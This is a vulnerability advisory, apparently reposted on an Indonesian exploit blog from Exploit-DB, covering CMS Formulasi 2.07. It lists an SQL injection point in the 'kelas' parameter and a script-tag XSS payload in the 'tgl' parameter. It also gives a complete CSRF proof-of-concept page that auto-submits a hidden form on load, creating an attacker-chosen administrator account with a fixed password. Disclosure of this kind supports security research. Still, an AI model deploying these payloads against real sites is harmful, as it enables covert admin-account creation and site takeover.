Exploit CMS Formulasi 2.07

========================
SQL Injection
========================
Found on
http://localhost/formulasi/kelas-siswa.html
parameter : kelas
post data : kelas=1{SQL_HERE}
========================
XSS Vulnerability
========================
Found On
parameter : tgl
http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>
========================
CSRF Vulnerability
========================
---------------------BOF--------------------------------------------------
<html>
<head>
<title>Formulasi CRSFT Exploit</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "489","36","27" );
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);
}
function fireForms()
{
    var count = 3;
    var i=0;
     
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
         
        pausecomp(pauses[i]);
    }
}
     
</script>
<H2>Formulasi CRSFT Exploit</H2>
<form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah">
<input type="hidden" name="nama_admin" value="usernya"/>
<input type="hidden" name="username" value="Sarahma12"/>
<input type="hidden" name="email" value="research@sarahma.co.id"/>
<input type="hidden" name="level_users" value="1"/>
<input type="hidden" name="password" value="Password12"/>
<input type="hidden" name="password_lagi" value="Password12"/>
</form>
</body>
</html>
---------------------EOF--------------------------------------------------
========================
Solution :
========================
No Update Until This Advisory published
  
========================
Timeline:
========================
2013-09-27 Provided details vulnerability to vendor
2013-10-01 Second NotificaTon Vendor
2013-10-04 No Response From Vendor Sumber EXPLOIT-DB


Sekianlah Postingan Dari GOPRESSXPLOITS Tentang " Exploit CMS Formulasi 2.07 " Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan " Exploit CMS Formulasi 2.07 " Dengan URL http://www.gopressxploits.org/2017/09/exploit-cms-formulasi-207.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Subscribe to receive free email updates:

0 Response to "Exploit CMS Formulasi 2.07"

Post a Comment